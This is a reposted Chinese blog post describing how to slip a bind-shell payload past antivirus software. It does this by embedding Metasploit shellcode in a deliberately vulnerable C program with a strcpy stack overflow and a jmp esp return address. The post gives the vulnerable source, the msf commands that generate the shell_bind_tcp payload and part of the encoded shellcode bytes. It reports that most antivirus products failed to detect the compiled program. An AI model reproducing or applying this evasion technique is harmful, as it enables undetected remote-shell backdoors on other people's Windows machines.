转载

通过溢出漏洞绕过杀毒防护

思路

通过编写一具有溢出漏洞的程序,并将恶意代码写入 shellcode 中,溢出后执行 shellcode 可以绕过杀毒软件的防护。

测试环境

Platform:Windows XP SP3

Compiler:VC 6.0

测试代码

构造如下漏洞代码加载 shellcode:

#include <stdio.h>

#include <string.h>

void overflow( char * input)

{

char buf[ 4 ];

strcpy(buf, input);

}

void main()

{

char shellcode[] = "AAAAAAAA"

"/x7b/x46/x86/x7c" //jmp esp

"/x90/x90/x90/x90"

"/x90/x90/x90/x90"

"/x90/x90/x90/x90"

"/x90/x90/x90/x90"

"/x90/x90/x90/x90"

"shellcode"

"/x90/x90/x90/x90"

"/x90/x90/x90/x90"

"/x90/x90/x90/x90"

"/x90/x90/x90/x90"

"/x90/x90/x90/x90" ;

overflow(shellcode);

}

首先,通过 msfpayload 生成一 payload,进行查杀,发现大部分杀毒都会报毒:

通过溢出漏洞绕过杀毒防护

生成 shellcode,并填入源码中:

msf > use payload/windows/shell/bind_tcp

msf payload(bind_tcp) > generate -b '/x00' -t c

/*

* windows/shell/bind_tcp - 312 bytes (stage 1 )

* http://www.metasploit.com

* Encoder : x86/shikata_ga_nai

* VERBOSE = false , LPORT = 4444 , RHOST =,

* PayloadUUIDTracking = false , EnableStageEncoding = false ,

* StageEncoderSaveRegisters =, StageEncodingFallback = true ,

* PrependMigrate = false , EXITFUNC =none, InitialAutoRunScript =,

* AutoRunScript =

*/

unsigned char buf[] =

"/xbd/x81/xf6/x2c/x43/xd9/xe9/xd9/x74/x24/xf4/x58/x31/xc9/xb1"

"/x48/x83/xc0/x04/x31/x68/x0f/x03/x68/x8e/x14/xd9/xbf/x78/x5a"

"/x22/x40/x78/x3b/xaa/xa5/x49/x7b/xc8/xae/xf9/x4b/x9a/xe3/xf5"

"/x20/xce/x17/x8e/x45/xc7/x18/x27/xe3/x31/x16/xb8/x58/x01/x39"

······

编译后发现成功绕过绝大多数杀毒软件:

通过溢出漏洞绕过杀毒防护

成功返回 shell(test with 360):

通过溢出漏洞绕过杀毒防护 通过溢出漏洞绕过杀毒防护

其他

@糖果师傅说这个思路在 02 年的时候就已经被提出来个,但是不知道为什么还是可以用,估计原因是杀毒软件还是偏向于静态查杀?

附 2002 年 Xcon 上的相关资料: 溢出植入型木马(后门)的原型实现

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 springcloud-demo Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 java-demo Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Hive教程 ANTLR教程 SpringCloud Ant教程 java实例教程 Hazelcast教程 XStream教程 Elastic-Job-Lite 深入浅出MyBatis ibaties教程 SVN教程 rabittmq教程 Hadoop教程 solr教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 next.js快速入门
  2. 2 利用acme.sh 申请 Google 免费证书
  3. 3 spring boot对接clerk 实现用户信息获取
  4. 4 spring boot 对接aws 的S3 服务,实现上传和查询
  5. 5 Spring Boot 集成支付宝当面付
  6. 6 Spring Cloud 3.x 集成 Google Datastore快速入门DEMO
  7. 7 如何在 Google Cloud Shell 中使用 Visual Studio Code (VS Code)?
  8. 8 Spring Cloud 3.x 集成 BigQuery
  9. 9 利用obs studio制作(人像+屏幕)录制影像
  10. 10 OBS studio使用智能手机当摄像头
网站信息
  • 文章总数:82,753 篇
  • 文件总数:284,361 个
  • 标签总数:2,431 个
  • 分类总数:85 个
  • 留言数量:2,559 条
  • 在线人数:666 人
  • 运行天数:4,501天
  • 最后更新:2025年02月22日23点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG